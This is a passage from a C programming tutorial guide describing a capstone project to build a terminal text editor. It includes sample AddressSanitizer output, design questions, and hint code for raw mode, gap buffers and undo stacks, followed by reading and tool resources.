Direct leak of 512 bytes in 8 objects allocated from:
    #0 0x10a3c890 in malloc
    #1 0x10a02345 in undo_push editor.c:156
    #2 0x10a02120 in editor_insert_char editor.c:89

SUMMARY: AddressSanitizer: 512 byte(s) leaked in 8 allocation(s).

# Example 2: Use-after-free in line buffer
=================================================================
==45679==ERROR: AddressSanitizer: heap-use-after-free on address 0x602000001234
READ of size 1 at 0x602000001234 thread T0
    #0 0x10a03456 in editor_render_line editor.c:234
    #1 0x10a02890 in editor_refresh_screen editor.c:201

0x602000001234 is located 4 bytes inside of 64-byte region [0x602000001230,0x602000001270)
freed by thread T0 here:
    #0 0x10a3c920 in free
    #1 0x10a02567 in editor_delete_line editor.c:178

previously allocated by thread T0 here:
    #0 0x10a3c890 in malloc
    #1 0x10a02123 in editor_insert_line editor.c:145

SUMMARY: AddressSanitizer: heap-use-after-free editor.c:234 in editor_render_line
```

### 4. Performance Characteristics

**Terminal output showing responsiveness:**

```bash
# Test: feed 10,000 "a" + Enter keypresses as fast as possible
# (assumes the editor reads piped stdin and exits at EOF; timings are illustrative)
$ time (yes "a" | head -n 10000 | ./mini_editor speed_test.txt)
real 0m0.234s   # ← Near-instant, responsive
user 0m0.180s
sys  0m0.048s

# Gap buffer makes cursor-position inserts amortized O(1)
# Screen refresh is optimized (only draw what changed)
```

### 5. Final Deliverables

By the end of this project, you'll have:

1. **A working text editor binary** that:
   - Opens and displays files
   - Allows text editing with immediate visual feedback
   - Supports navigation with arrow keys
   - Implements undo/redo with Ctrl-Z and Ctrl-Y
   - Saves files to disk
   - Handles files of reasonable size (up to thousands of lines)
2. **Clean memory management** verified by:
   - AddressSanitizer showing 0 leaks
   - Valgrind showing "All heap blocks were freed -- no leaks are possible"
   - No crashes during extended use
3. **Well-structured code** including:
   - `editor.c` - Core editor logic
   - `buffer.c` - Gap buffer implementation
   - `terminal.c` - Raw mode and ANSI escape sequences
   - `undo.c` - Undo/redo stack management
   - `main.c` - Entry point and main loop
4. **Documentation** showing:
   - Architecture decisions (why gap buffer vs rope)
   - Memory ownership diagram
   - Undo/redo state machine
   - Performance characteristics

### Why This Matters

A text editor is the ultimate integration project because it requires:
- **Memory management expertise**: Dynamic buffers, undo history, no leaks over hours of use
- **Real-time performance**: Every keystroke must be instant, no visible lag
- **Stateful complexity**: Cursor position, undo stack, modified flag, file I/O
- **Systems programming**: Raw terminal mode, escape sequences, signal handling
- **Data structure mastery**: Gap buffers for efficient editing

After completing this, you'll have proven you can:
- Build a complex, stateful application in C
- Manage memory lifetimes across multiple subsystems
- Reason about performance (why gap buffer vs linked list)
- Debug memory issues in a real codebase
- Ship a working product that you actually use

This is Resume Gold because you can:
- Demo it live in an interview
- Show the code and explain design decisions
- Point to AddressSanitizer output proving no leaks
- Compare it to real editors (nano, vim, emacs) architecturally

**Most importantly**: You'll have crossed the threshold from "learning C" to "building with C."

---

**Learning milestones**:

1. **First milestone**: Basic text display and cursor movement: you understand terminal I/O at the byte level
2. **Second milestone**: Insert/delete characters: you've built a gap buffer and understand why
3. **Third milestone**: Undo/redo works: you truly understand object lifetime and ownership
4. **Final milestone**: You run your editor daily while developing, and it doesn't crash

---

### The Core Question You're Answering

> "Can I build a real, usable application that manages complex memory lifetimes without leaking or crashing?"

A text editor is the ultimate test of memory management skills. Users run editors for hours. Every keystroke modifies data structures. Undo/redo holds history. If you leak, memory use grows until the program eventually dies. If you double-free, it typically crashes on the spot. There's nowhere to hide.

---

### Concepts You Must Understand First

**Stop and research these before coding:**

1. **Terminal Raw Mode**
   - What's the difference between "cooked" and "raw" terminal mode?
   - How do you read individual keypresses without waiting for Enter?
   - How do you disable echo, line buffering, and control characters?
   - *Book Reference:* "Advanced Programming in the UNIX Environment" Ch. 18 - Stevens & Rago
2. **ANSI Escape Sequences**
   - How do you move the cursor with escape codes?
   - How do you clear the screen? Change colors?
   - What is a VT100/ANSI terminal?
   - *Resource:* [ANSI Escape Codes](https://en.wikipedia.org/wiki/ANSI_escape_code)
3. **Text Buffer Data Structures**
   - **Array of lines**: Simple but slow for long lines
   - **Gap buffer**: Fast insertions at cursor, used by Emacs among other editors
   - **Piece table**: The basis of VS Code's text buffer
   - **Rope**: For very large files
   - *Resource:* "Text Editor Data Structures" - various blog posts and papers
4. **Undo/Redo Models**
   - Command pattern: Store operations, not state
   - Snapshot: Store full state at each change (memory intensive)
   - Delta: Store diffs (complex but efficient)
   - How do you implement branching undo (like Vim's undo tree)?
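
To make the "array of lines" option from the list above concrete, here is a minimal sketch of inserting one character into a single line stored as a growable array. The `Line` type and the `line_insert_char` / `line_free` names are hypothetical, chosen only for this illustration; the growth policy (start at 16 bytes, then double) is likewise an assumption.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical type for illustration: one line of text, not NUL-terminated. */
typedef struct {
    char  *data;  /* heap buffer owned by this Line */
    size_t len;   /* bytes in use */
    size_t cap;   /* bytes allocated */
} Line;

/* Insert c at index `at` (0 <= at <= len).
 * Returns 0 on success, -1 if memory could not be allocated. */
int line_insert_char(Line *ln, size_t at, char c) {
    assert(at <= ln->len);
    if (ln->len == ln->cap) {
        size_t new_cap = ln->cap ? ln->cap * 2 : 16;  /* assumed growth policy */
        char *p = realloc(ln->data, new_cap);
        if (!p) return -1;  /* the old buffer is still valid and still owned */
        ln->data = p;
        ln->cap = new_cap;
    }
    /* Shift the tail right by one byte: this is the O(n) cost on long lines. */
    memmove(ln->data + at + 1, ln->data + at, ln->len - at);
    ln->data[at] = c;
    ln->len++;
    return 0;
}

/* Release the buffer and reset the Line to its empty state. */
void line_free(Line *ln) {
    free(ln->data);
    ln->data = NULL;
    ln->len = ln->cap = 0;
}
```

Start from `Line ln = {0};` and call `line_insert_char(&ln, index, ch)` per keystroke. Every insert in the middle moves the whole tail of the line, which is the cost a gap buffer is designed to avoid.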
---

### Questions to Guide Your Design

**Before implementing, think through these:**

1. **Buffer Representation**
   - How will you represent the text in memory?
   - Array of strings (lines)? One big gap buffer? Linked list of lines?
   - What happens when the user inserts in the middle of a 10,000 character line?
   - What happens when the file has 100,000 lines?
2. **Screen Rendering**
   - How do you map buffer positions to screen positions?
   - What if a line is longer than the screen width?
   - How do you handle scrolling efficiently?
   - Do you redraw the whole screen or just what changed?
3. **Undo/Redo Stack**
   - What do you store in the undo stack? Full file? Just the change?
   - When do you add to the stack? Every character? Every "word"?
   - What happens to the redo stack when the user types after undo?
   - How do you prevent the undo stack from consuming infinite memory?
4. **File I/O**
   - How do you load a file into your buffer?
   - How do you save? Overwrite directly or write to temp first?
   - What about the "modified" flag? When do you show "unsaved changes"?
5. **Memory Ownership**
   - Who owns each line's memory?
   - When you undo a deletion, do you restore the original pointer or make a copy?
   - How do you ensure no leaks after 1000 undo/redo cycles?

---

### Thinking Exercise: Trace the Operations

Walk through these operations on paper:

```
1. Open file "test.txt" containing:
   Line 1: "Hello World"
   Line 2: "Goodbye World"
2. Cursor is at start of file
3. Move cursor to position 6 (after "Hello ")
4. Type "Beautiful "
5. Text is now: "Hello Beautiful World"
6. Press Ctrl-Z (undo)
7. Text is now: "Hello World"
8. Type "Cruel "
9. Text is now: "Hello Cruel World"
10. Press Ctrl-Z
11. Press Ctrl-Z again
```

*Questions:*
- What does your buffer look like after each step?
- What's in your undo stack after step 5? After step 8?
- What's in your redo stack after step 7? After step 9?
- What memory allocations and frees happen at each step?
- What does the final undo (step 11) produce?
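
For the File I/O design question above (overwrite directly, or write to a temp file first), one possible answer is sketched below: write everything to a sibling temporary file, then rename it over the target. The function name `save_lines_atomic` and the `.tmp` suffix are hypothetical, and the sketch assumes POSIX `rename()` semantics, where replacing an existing file is atomic. It does not call `fsync`, so it protects against a half-written file after a failed write, not against power loss.

```c
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper: writes n lines to `path` through a temp file.
 * Returns 0 on success, -1 on failure (an existing `path` is left untouched). */
int save_lines_atomic(const char *path, char *const *lines, size_t n) {
    assert(path != NULL);
    size_t tmp_len = strlen(path) + sizeof ".tmp";  /* sizeof counts the NUL */
    char *tmp = malloc(tmp_len);
    if (!tmp) return -1;
    snprintf(tmp, tmp_len, "%s.tmp", path);

    FILE *f = fopen(tmp, "w");
    if (!f) { free(tmp); return -1; }

    int ok = 1;
    for (size_t i = 0; i < n && ok; i++) {
        if (fputs(lines[i], f) == EOF || fputc('\n', f) == EOF) ok = 0;
    }
    if (fclose(f) != 0) ok = 0;  /* fclose flushes, so write errors can surface here */

    /* Assumption: POSIX rename(), which atomically replaces an existing file. */
    if (ok && rename(tmp, path) != 0) ok = 0;
    if (!ok) remove(tmp);        /* do not leave a stale temp file behind */
    free(tmp);
    return ok ? 0 : -1;
}
```

The temp buffer is the only allocation, and every return path after `malloc` frees it, which is the kind of ownership check the Memory Ownership questions ask you to make.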
---

### The Interview Questions They'll Ask

Prepare to answer these:

1. "What data structure would you use to represent text in an editor? Why?"
2. "How would you implement undo/redo?"
3. "How do you handle terminal input in raw mode?"
4. "What happens if the user opens a 1GB file?"
5. "How would you search for text efficiently in a large file?"
6. "How do you ensure your editor doesn't leak memory over time?"

---

### Hints in Layers (Only If Stuck)

**Hint 1: Follow the Kilo Tutorial**

The [Kilo tutorial](https://viewsourcecode.org/snaptoken/kilo/), based on the kilo editor by antirez (Redis creator), is excellent. It walks through building a minimal editor step-by-step. Start here, then add your own features.

**Hint 2: Raw Mode Basics**

```c
#include <termios.h>  // struct termios, tcgetattr, tcsetattr
#include <unistd.h>   // STDIN_FILENO

struct termios orig_termios;  // Saved so the terminal can be restored later

void enableRawMode(void) {
    tcgetattr(STDIN_FILENO, &orig_termios);
    struct termios raw = orig_termios;
    raw.c_lflag &= ~(ECHO | ICANON | ISIG);  // No echo, char-by-char, no signals
    raw.c_iflag &= ~(IXON | ICRNL);          // No Ctrl-S/Q, fix Ctrl-M
    tcsetattr(STDIN_FILENO, TCSAFLUSH, &raw);
}

void disableRawMode(void) {
    tcsetattr(STDIN_FILENO, TCSAFLUSH, &orig_termios);
}
```

Call `disableRawMode()` on exit, or the terminal will stay in raw mode after your program ends!
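
One way to make sure the restore actually happens is to register it with `atexit` and to check every return value. The sketch below is a variation on the hint, not the tutorial's code: the names `make_raw`, `restore_terminal`, and `enable_raw_mode` are hypothetical, and setting `VMIN`/`VTIME` so that `read()` returns after one byte is an added assumption.

```c
#include <assert.h>
#include <stdlib.h>
#include <termios.h>
#include <unistd.h>

static struct termios saved_termios;  /* settings to restore at exit */
static int raw_enabled = 0;

/* Pure helper: returns a copy of t with the raw-mode changes applied. */
struct termios make_raw(struct termios t) {
    t.c_lflag &= ~(tcflag_t)(ECHO | ICANON | ISIG);  /* no echo, no line mode, no signals */
    t.c_iflag &= ~(tcflag_t)(IXON | ICRNL);          /* no Ctrl-S/Q, no CR-to-NL mapping */
    t.c_cc[VMIN] = 1;   /* assumption: read() returns once 1 byte is available */
    t.c_cc[VTIME] = 0;  /* assumption: no read timeout */
    return t;
}

static void restore_terminal(void) {
    if (raw_enabled) {
        tcsetattr(STDIN_FILENO, TCSAFLUSH, &saved_termios);
        raw_enabled = 0;
    }
}

/* Returns 0 on success, -1 if stdin is not a terminal or a call fails. */
int enable_raw_mode(void) {
    if (!isatty(STDIN_FILENO)) return -1;
    if (tcgetattr(STDIN_FILENO, &saved_termios) == -1) return -1;
    struct termios raw = make_raw(saved_termios);
    if (tcsetattr(STDIN_FILENO, TCSAFLUSH, &raw) == -1) return -1;
    raw_enabled = 1;
    /* atexit handlers run on exit() and on return from main,
     * but not on abort() or when a fatal signal kills the process. */
    if (atexit(restore_terminal) != 0) {
        restore_terminal();
        return -1;
    }
    return 0;
}
```

Keeping the flag changes in a pure function makes them checkable without a real terminal. Because the handler does not run after a crash, typing `reset` in the shell is still worth knowing while you debug.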

**Hint 3: Simple Gap Buffer**

A gap buffer keeps a "gap" at the cursor position:

```
"Hello World"
       ^cursor

In memory:
['H','e','l','l','o',' ',GAP,GAP,GAP,GAP,'W','o','r','l','d']
                         ^gap_start      ^gap_end

To insert 'X': put 'X' at gap_start, increment gap_start
To delete: just move gap boundaries
To move cursor: shift text across the gap
```

![Gap Buffer Data Structure](assets/gap_buffer.jpg)

Insertions at the cursor are O(1) while the gap has room (amortized O(1) if the buffer grows geometrically when the gap fills). Moving the cursor is O(n) in the worst case, but the distance moved is typically small.
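
The three operations in the diagram can be sketched in C as follows. This is one possible layout, not a reference implementation: the `GapBuffer` struct and all `gb_*` names are hypothetical, `gap_end` is treated as one past the last gap byte, and doubling the capacity when the gap fills is an assumed policy.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

typedef struct {
    char  *buf;        /* text before the gap, the gap, text after the gap */
    size_t cap;        /* total bytes allocated */
    size_t gap_start;  /* first gap byte; also the cursor position */
    size_t gap_end;    /* one past the last gap byte */
} GapBuffer;

int gb_init(GapBuffer *gb, size_t cap) {
    if (cap == 0) cap = 1;
    gb->buf = malloc(cap);
    if (!gb->buf) return -1;
    gb->cap = cap;
    gb->gap_start = 0;
    gb->gap_end = cap;  /* the whole buffer starts out as gap */
    return 0;
}

size_t gb_length(const GapBuffer *gb) {
    return gb->cap - (gb->gap_end - gb->gap_start);
}

/* Move the cursor to text position pos by shifting text across the gap. */
void gb_move_cursor(GapBuffer *gb, size_t pos) {
    assert(pos <= gb_length(gb));
    if (pos < gb->gap_start) {          /* moving left: text goes to after the gap */
        size_t n = gb->gap_start - pos;
        memmove(gb->buf + gb->gap_end - n, gb->buf + pos, n);
        gb->gap_start -= n;
        gb->gap_end -= n;
    } else if (pos > gb->gap_start) {   /* moving right: text goes to before the gap */
        size_t n = pos - gb->gap_start;
        memmove(gb->buf + gb->gap_start, gb->buf + gb->gap_end, n);
        gb->gap_start += n;
        gb->gap_end += n;
    }
}

/* Called when the gap is empty: double the capacity, keep the tail at the end. */
static int gb_grow(GapBuffer *gb) {
    size_t new_cap = gb->cap * 2;
    char *p = realloc(gb->buf, new_cap);
    if (!p) return -1;
    size_t tail = gb->cap - gb->gap_end;
    memmove(p + new_cap - tail, p + gb->gap_end, tail);
    gb->buf = p;
    gb->gap_end = new_cap - tail;
    gb->cap = new_cap;
    return 0;
}

/* Insert c at the cursor. Returns 0 on success, -1 on allocation failure. */
int gb_insert(GapBuffer *gb, char c) {
    if (gb->gap_start == gb->gap_end && gb_grow(gb) != 0) return -1;
    gb->buf[gb->gap_start++] = c;
    return 0;
}

/* Delete the character before the cursor. Returns 1 if one was deleted, else 0. */
int gb_backspace(GapBuffer *gb) {
    if (gb->gap_start == 0) return 0;
    gb->gap_start--;  /* the byte simply becomes part of the gap */
    return 1;
}

/* Copy the text, without the gap, into out (needs gb_length(gb) + 1 bytes). */
void gb_copy_text(const GapBuffer *gb, char *out) {
    memcpy(out, gb->buf, gb->gap_start);
    memcpy(out + gb->gap_start, gb->buf + gb->gap_end, gb->cap - gb->gap_end);
    out[gb_length(gb)] = '\0';
}

void gb_free(GapBuffer *gb) {
    free(gb->buf);
    gb->buf = NULL;
    gb->cap = gb->gap_start = gb->gap_end = 0;
}
```

Note that deleting never frees or moves anything: the gap just widens. The only allocation is in `gb_init` and `gb_grow`, so ownership is simple: the `GapBuffer` owns `buf`, and `gb_free` is the single place it is released.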

**Hint 4: Simple Undo Stack**

```c
typedef enum { INSERT, DELETE } ActionType;

typedef struct {
    ActionType type;
    int pos;     // Where the action occurred
    char* text;  // The text that was inserted/deleted
    int len;     // Length of text
} UndoAction;

// To undo INSERT: delete the text at pos
// To undo DELETE: insert the text at pos
// Push to undo stack on each edit
// On undo: pop from undo stack, perform reverse, push to redo stack
```
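
The comments in the hint can be turned into a small working model. The sketch below is an illustration under stated assumptions, not the intended solution: the document is a hypothetical fixed-size `Doc` with a 256-byte text buffer, the `ActionStack`, `record`, `transfer`, and `doc_*` names are invented for this example, and `pos`/`len` use `size_t` rather than the hint's `int`. The point to watch is ownership: each action's `text` is a heap copy owned by whichever stack currently holds the action.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

typedef enum { INSERT, DELETE } ActionType;

typedef struct {
    ActionType type;
    size_t pos;   /* where the action occurred */
    char  *text;  /* heap copy of the inserted/deleted text */
    size_t len;
} UndoAction;

typedef struct { UndoAction *items; size_t count, cap; } ActionStack;

/* Hypothetical toy document: one fixed-size, NUL-terminated buffer. */
typedef struct { char text[256]; ActionStack undo, redo; } Doc;

static int stack_push(ActionStack *s, UndoAction a) {
    if (s->count == s->cap) {
        size_t cap = s->cap ? s->cap * 2 : 8;
        UndoAction *p = realloc(s->items, cap * sizeof *p);
        if (!p) return -1;
        s->items = p;
        s->cap = cap;
    }
    s->items[s->count++] = a;
    return 0;
}

/* Frees every action's text, then the array itself. */
static void stack_clear(ActionStack *s) {
    for (size_t i = 0; i < s->count; i++) free(s->items[i].text);
    free(s->items);
    s->items = NULL;
    s->count = s->cap = 0;
}

/* Raw edits that do not touch history. */
static void raw_insert(Doc *d, size_t pos, const char *t, size_t len) {
    size_t n = strlen(d->text);
    assert(pos <= n && n + len < sizeof d->text);
    memmove(d->text + pos + len, d->text + pos, n - pos + 1);
    memcpy(d->text + pos, t, len);
}

static void raw_delete(Doc *d, size_t pos, size_t len) {
    size_t n = strlen(d->text);
    assert(pos + len <= n);
    memmove(d->text + pos, d->text + pos + len, n - pos - len + 1);
}

/* Record a user edit: copy the text, push it, apply it, drop redo history. */
static int record(Doc *d, ActionType type, size_t pos, const char *t, size_t len) {
    char *copy = malloc(len + 1);
    if (!copy) return -1;
    memcpy(copy, t, len);
    copy[len] = '\0';
    UndoAction a = { type, pos, copy, len };
    if (stack_push(&d->undo, a) != 0) { free(copy); return -1; }
    if (type == INSERT) raw_insert(d, pos, copy, len);
    else raw_delete(d, pos, len);
    stack_clear(&d->redo);  /* a new edit invalidates everything that was undone */
    return 0;
}

int doc_insert(Doc *d, size_t pos, const char *t) {
    return record(d, INSERT, pos, t, strlen(t));
}

int doc_delete(Doc *d, size_t pos, size_t len) {
    assert(pos + len <= strlen(d->text));
    return record(d, DELETE, pos, d->text + pos, len);
}

/* Move the top action between stacks and apply it (reversed when undoing).
 * Returns 1 if an action was applied, 0 if `from` was empty, -1 on OOM. */
static int transfer(Doc *d, ActionStack *from, ActionStack *to, int reverse) {
    if (from->count == 0) return 0;
    UndoAction a = from->items[from->count - 1];
    if (stack_push(to, a) != 0) return -1;  /* on failure `from` still owns a.text */
    from->count--;                          /* ownership of a.text moves to `to` */
    int do_insert = (a.type == INSERT) != (reverse != 0);
    if (do_insert) raw_insert(d, a.pos, a.text, a.len);
    else raw_delete(d, a.pos, a.len);
    return 1;
}

int doc_undo(Doc *d) { return transfer(d, &d->undo, &d->redo, 1); }
int doc_redo(Doc *d) { return transfer(d, &d->redo, &d->undo, 0); }
void doc_free(Doc *d) { stack_clear(&d->undo); stack_clear(&d->redo); }
```

Start from `Doc d = {0};`, fill `d.text`, and call `doc_insert`, `doc_delete`, `doc_undo`, and `doc_redo`. Because undo and redo move an action between stacks instead of copying it, no allocation or free happens on Ctrl-Z or Ctrl-Y; text is freed only when a new edit clears the redo stack or when `doc_free` runs.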

**Hint 5: Escape Sequence Basics**

```c
// Fragment: place inside a function.
// Needs <stdio.h> (snprintf), <string.h> (strlen), <unistd.h> (write, STDOUT_FILENO).
// row and col are ints you supply.

// Clear screen
write(STDOUT_FILENO, "\x1b[2J", 4);

// Move cursor to position (row, col) - 1-indexed
char buf[32];
snprintf(buf, sizeof(buf), "\x1b[%d;%dH", row, col);
write(STDOUT_FILENO, buf, strlen(buf));

// Hide cursor
write(STDOUT_FILENO, "\x1b[?25l", 6);

// Show cursor
write(STDOUT_FILENO, "\x1b[?25h", 6);
```
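
Issuing one `write` per escape sequence can cause visible flicker, so a common approach is to build the whole frame in memory and send it in one go. The sketch below shows that idea under stated assumptions: the `OutBuf` type and the `ob_*` names are hypothetical, and the initial capacity of 64 bytes is arbitrary.

```c
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical append buffer that collects one frame of terminal output. */
typedef struct { char *data; size_t len, cap; } OutBuf;

/* Append n bytes of s. Returns 0 on success, -1 on allocation failure. */
int ob_append(OutBuf *ob, const char *s, size_t n) {
    if (n == 0) return 0;
    if (ob->len + n > ob->cap) {
        size_t cap = ob->cap ? ob->cap : 64;
        while (cap < ob->len + n) cap *= 2;
        char *p = realloc(ob->data, cap);
        if (!p) return -1;
        ob->data = p;
        ob->cap = cap;
    }
    memcpy(ob->data + ob->len, s, n);
    ob->len += n;
    return 0;
}

/* Append the cursor-position sequence ESC [ row ; col H (both 1-indexed). */
int ob_move_cursor(OutBuf *ob, int row, int col) {
    assert(row >= 1 && col >= 1);
    char seq[32];
    int n = snprintf(seq, sizeof seq, "\x1b[%d;%dH", row, col);
    if (n < 0 || (size_t)n >= sizeof seq) return -1;
    return ob_append(ob, seq, (size_t)n);
}

/* Write the buffered bytes to fd, retrying after partial writes. */
int ob_flush(OutBuf *ob, int fd) {
    size_t off = 0;
    while (off < ob->len) {
        ssize_t w = write(fd, ob->data + off, ob->len - off);
        if (w < 0) return -1;
        off += (size_t)w;
    }
    ob->len = 0;  /* keep the allocation for the next frame */
    return 0;
}

void ob_free(OutBuf *ob) {
    free(ob->data);
    ob->data = NULL;
    ob->len = ob->cap = 0;
}
```

A refresh would then append "hide cursor", the visible rows, the cursor move, and "show cursor" to one `OutBuf` (starting from `OutBuf ob = {0};`) and call `ob_flush(&ob, STDOUT_FILENO)` once. Reusing the same buffer across frames also avoids an allocation per keypress.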

---

### Progressive Build Order

Build in this order for maximum learning:

1. **Week 1: Terminal I/O**
   - Raw mode and reading keypresses
   - Printing to screen at specific positions
   - Cursor movement with arrow keys
   - Just display a static message and move cursor around
2. **Week 2: Text Display**
   - Load a file into an array of strings
   - Display it on screen with scrolling
   - Move cursor through the document
   - No editing yet, just viewing
3. **Week 3: Editing**
   - Insert characters at cursor
   - Delete with backspace
   - Insert new lines with Enter
   - Save to file
4. **Week 4: Undo/Redo**
   - Track changes
   - Implement undo
   - Implement redo
   - Test with AddressSanitizer
5. **Week 5+: Polish**
   - Search (Ctrl-F)
   - Syntax highlighting (if ambitious)
   - Line numbers
   - Status bar

---

### Books That Will Help

| Topic | Book | Chapter |
|-------|------|---------|
| Terminal programming | "Advanced Programming in the UNIX Environment" | Ch. 18 |
| Data structures | "Data Structures and Algorithms" | Relevant chapters |
| C systems programming | "The C Programming Language" | All of it |
| Memory management | "Understanding and Using C Pointers" | Ch. 1-4 |
| UNIX I/O | "The Linux Programming Interface" | Ch. 4-5, 62 |

---

## Summary

| # | Project | Main Language |
|---|---------|---------------|
| 1 | Memory Inspector Tool | C |
| 2 | Safe String Library | C |
| 3 | Memory Leak Detector | C |
| 4 | Arena Allocator | C |
| 5 | Exploit Lab (Buffer Overflow Playground) | C |
| **Capstone** | Mini Text Editor | C |

---

## Resources

### Books

- **Computer Systems: A Programmer's Perspective** - Bryant & O'Hallaron (the definitive guide)
- **The C Programming Language** - Kernighan & Ritchie (the classic)
- **Understanding and Using C Pointers** - Richard Reese (pointer mastery)
- **C Interfaces and Implementations** - David Hanson (advanced patterns)
- **Hacking: The Art of Exploitation** - Jon Erickson (security perspective)

### Online Resources

- [Understanding and Using C Pointers - O'Reilly](https://www.oreilly.com/library/view/understanding-and-using/9781449344535/)
- [LLDB Tutorial - Official LLVM Documentation](https://lldb.llvm.org/use/tutorial.html)
- [PDR: LLDB Tutorial - Aaron Bloomfield](https://aaronbloomfield.github.io/pdr/tutorials/02-lldb/index.html)
- [Memory Allocators 101 - Arjun Sreedharan](https://arjunsreedharan.org/post/148675821737/memory-allocators-101-write-a-simple-memory)
- [malloc() from Scratch - Tenzin Migmar](https://medium.com/@tenzinmigmar/malloc-from-scratch-dbc1bc23dfde)
- [Master memory management - 42 Studio](https://medium.com/a-42-journey/how-to-create-your-own-malloc-library-b86fedd39b96)
- [Dancing in the Debugger - objc.io](https://www.objc.io/issues/19-debugging/lldb-debugging/)
- [Demystifying malloc - DEV Community](https://dev.to/_0xsegfault/demystifying-malloc-build-your-own-memory-allocator-in-c-1ao9)
- [Kilo Text Editor Tutorial](https://viewsourcecode.org/snaptoken/kilo/)

### Tools Documentation

- [LLVM AddressSanitizer](https://clang.llvm.org/docs/AddressSanitizer.html) - Compiler instrumentation that detects memory bugs at runtime
- [Valgrind](https://valgrind.org/docs/manual/mc-manual.html) - Runtime memory analysis
- [GDB Documentation](https://sourceware.org/gdb/current/onlinedocs/gdb/) - The GNU Debugger

---

**Total Estimated Time**: 4-6 weeks of focused study

**After completion**: You will understand memory at the level that separates "programmers who use C" from "programmers who think in C." You'll be able to debug memory issues that mystify others, write code that's both fast and safe, and understand why modern languages like Rust were designed the way they were.